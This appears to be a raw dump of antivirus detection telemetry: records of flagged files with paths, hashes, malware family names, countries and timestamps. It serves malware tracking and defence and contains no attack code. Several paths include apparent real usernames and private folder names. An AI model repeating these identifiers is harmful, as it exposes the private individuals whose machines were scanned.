  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsb4E0C.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsm516F.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:56:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Clover\\Clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:15:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dllhost.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_00-09-39\\dllhost.exe', filesize=576000, name='TR/Patched.Gen.#M300.#R3374'), hash='6986d5ba98f2045982e0b194db81dcfd48b66fb5eb8088d76935846a6c9830e8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T18:40:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013032-27ba5ece', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_e6e2b2c5\\AVSCAN-20181102-012909-17476477\\AVSCAN-20181102-013032-27BA5ECE', filesize=192000, name='TR/Black.Gen2.#M1.#R1'), hash='557e7e2b852f5f84cb105fa10dd73dfd5c84eaac3a6567c5cac6b59579a690d3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:31:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110249-37195c35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68ba5657\\AVSCAN-20181101-110204-2F20D71F\\AVSCAN-20181101-110249-37195C35', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:02:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Windows\\System32\\DriverStore\\FileRepository\\hdart.inf_x86_neutral_19825fd7f8bfb7f8\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='66a1a8a6501bf73a145118d6843a4f9dd2a397035c65cbccc91422dc3dc394fa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:40:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='5e934f7a46d8fdd46bbcc512b4e12d55dc39c6aa56ab224b089320c81e0b3b7e', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T16:30:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Program Files\\lpt\\smartbar.communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\PROGRAM FILES\\Adobe\\Acrobat 9.0\\Acrobat\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='cc465ed7f2e62b4ab474979ff5ecd27af4da2969c06384a4db099a2c34e25d9f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:56:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111614-227645ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111614-227645EE', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:15:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e87ba73eacc8dc602eb8fa4abab91936e54d803525767308a8a6e9162109c0a9.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\01.12.2017-194.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1000664\\e87ba73eacc8dc602eb8fa4abab91936e54d803525767308a8a6e9162109c0a9.MRG', filesize=64000, name='HEUR/AGEN.1000664.#M1.#R1'), hash='e87ba73eacc8dc602eb8fa4abab91936e54d803525767308a8a6e9162109c0a9', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\01.12.2017-212.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-01T15:04:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105917-a22fdb8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105917-A22FDB8A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090604-f5879406', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b74c1cd5\\AVSCAN-20181101-090516-EE59C3E3\\AVSCAN-20181101-090604-F5879406', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='72fb1b1fdf6460845b84b6d8140470ec90b16929bcc160bb4c3e836bac9ee404', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:06:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cmcontainer_details.htm', filepath='C:\\Users\\Sri Chakra\\AppData\\Local\\Temp\\CodeMeter_v6.40.2405.502\\Redist\\CodeMeter\\Runtime\\help\\6.40b\\CmUserHelp\\us\\cmcontainer_details.htm', filesize=392000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='8c0211bdaf62dfb241d25321e9d5436c3860895c070118cc72dd50c3120c51ff', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:43:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164743-fce85868', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5d88258d\\AVSCAN-20181101-164612-EB70B92E\\AVSCAN-20181101-164743-FCE85868', filesize=2368000, name='HEUR/AGEN.1018955.#M1.#R1'), hash='6bc95992f821e05c0d0664c1a567d5f7c661635aaa6395e4f7664bac5c138d36', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T11:17:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171615-e06eba78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2909a85d\\AVSCAN-20181101-171341-D20DAD51\\AVSCAN-20181101-171615-E06EBA78', filesize=1088000, name='Adware/Wajam.aib.#M1.#R1'), hash='82203383485fae16dd542873a34c1fe0f7428bccfaa5bf5c848a8c17cd6a6950', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:16:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:13:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hl.exe:xguard', filepath='\\\\?\\C:\\Games\\Counter-Strike\\hl.exe:xguard', filesize=448000, name='HEUR/APC.#M1.#R1'), hash='0dcb5d826951e384eae566b477639eae50e4e0d186e58047c6de99f512d96410', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:17:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='graph.exe', filepath='C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE', filesize=4336000, name='W32/Jeefo.A.#M1.#R1'), hash='457eb99755520770d7079a8ee4a46c4b35a26718179f1b74f2e33736fa8c441b', metadata=Row(cmdline='--engine=2 --session-id=okved4KaRzfyEqGu+zLME5ZsA\\\\\\/PrLSgr5yZtqZxK --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-01T09:27:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-093122-e48305f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181102-092506-AD362901\\AVSCAN-20181102-093122-E48305F6', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:56:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185552-d2c1c2d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-150956-499E2B77\\AVSCAN-20181101-185552-D2C1C2D2', filesize=768000, name='Adware/DealPly.7eb84c.#M1.#R1'), hash='7eb84cddc65713657bd94e7995a806e32c7983547acd5f7118def39d4fc674e6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T11:55:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpk.dll', filepath='F:\\lpk.dll', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6f6490513aa0a0973f442e7e27517de3e0b674eb76130922ebc27260d1682881', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-01T11:26:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='017824bc3d03775692680b7970ef6237615b05f45fd578c29894abd449379b08.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-19.available\\Avira\\017824BC3D03775692680B7970EF6237615B05F45FD578C29894ABD449379B08.VIR', filesize=576000, name='HEUR/AGEN.1035343.#M1.#R1'), hash='017824bc3d03775692680b7970ef6237615b05f45fd578c29894abd449379b08', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:40:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered daret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered daret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='303277724f38609bceb633bcc00b942f5e87b0ce735fe749deaa91bf6183e822', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:16:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0ab293ff-0e7d-f4d7-da2a-1d3b17966654.exe', filepath='G:\\{c5b90192-0807-f069-1eb5-b9464b466331}\\0ab293ff-0e7d-f4d7-da2a-1d3b17966654.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe', parentsize=960576, timestamp='2018-11-01T09:10:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:15:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-004830-da9b1e89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d97a9cc7\\AVSCAN-20181102-004808-D5DDF8DF\\AVSCAN-20181102-004830-DA9B1E89', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:48:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-140227-4ed6471a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-140155-4A2FA7D7\\AVSCAN-20181101-140227-4ED6471A', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:02:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2254.exe', filepath='I:\\.Trashes\\2254.exe', filesize=512000, name='TR/Dropper.Gen.#M300.#R241'), hash='83ef079fb538f232884ca1f3c64ad14e939d3ddcf013d1089320abc77477beab', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:21:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.654\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.654\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:12:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='skm_4050151222162800.doc', filepath='/Users/paulpettitt/Downloads/SKM_4050151222162800.doc', filesize=64000, name='W97M/Dldr.Agent.AM.7117126.#M0.#R0'), hash='60c2aa4d30f1a1d84e03cde89c9d16de70071f0bed798a95e309218a8ee64997', metadata=Row(cmdline=None, country='GB', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:38:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T13:06:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:44:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpk.dll', filepath='F:\\lpk.dll', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6f6490513aa0a0973f442e7e27517de3e0b674eb76130922ebc27260d1682881', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-01T10:17:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AUT Client\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='58976432b3037c64669a08a76209791c56a1c7e76f5ea872de52c4d77314ff22', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe779_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe779 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:45:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T18:03:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f42f11fd88268bcf3347f65f25dfcfcf3b9212b93f9be94c7e028014d0506d8b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F42F11FD88268BCF3347F65F25DFCFCF3B9212B93F9BE94C7E028014D0506D8B', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='f42f11fd88268bcf3347f65f25dfcfcf3b9212b93f9be94c7e028014d0506d8b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='comms.dll', filepath='C:\\Users\\X\\Downloads\\Telegram Desktop\\FINGERPRINT\\SDK\\SDK VB 6 & Delphi\\comms.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='b799ac02fd61704822e2891d776a400c49fff137b2c9f9bd517c872ce67843c8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:30:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104441-22dfa4d2', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-104406-AAF951B0\\AVSCAN-20181101-104441-22DFA4D2', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sumatrapdfsetup.exe', filepath='D:\\ADEL 010116\\Adel_old\\old 27-08-2014\\My Documents\\Downloads\\old\\SumatraPDFSetup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='8880a07b15ded53364747db66afca615da6251894f52c506c9c6a8c7cc26a03c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:36:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222701-6e9e19d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-222645-6533CACD\\AVSCAN-20181101-222701-6E9E19D9', filesize=640000, name='TR/RedCap.xaclj.#M1.#R1'), hash='c980ed2cdf5a796dd132a46207a4e3e5f03675d66c465cff0294dad34b9591c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\2sqdxocy52f\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:59:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rzfo073', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RZFO073', filesize=64000, name='VBA/Dldr.Agent.tlcym.#M1.#R1'), hash='c379ce56c97f30e587aef5054ce5a4fd1e1d0d095b6ff80d6b423553ce223850', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='giardiniere.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\AGRICOLI\\GIARDINIERE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dipendenze.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\DIPENDENZE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:41Z'), dt=datetime.date(2018, 11, 1)),
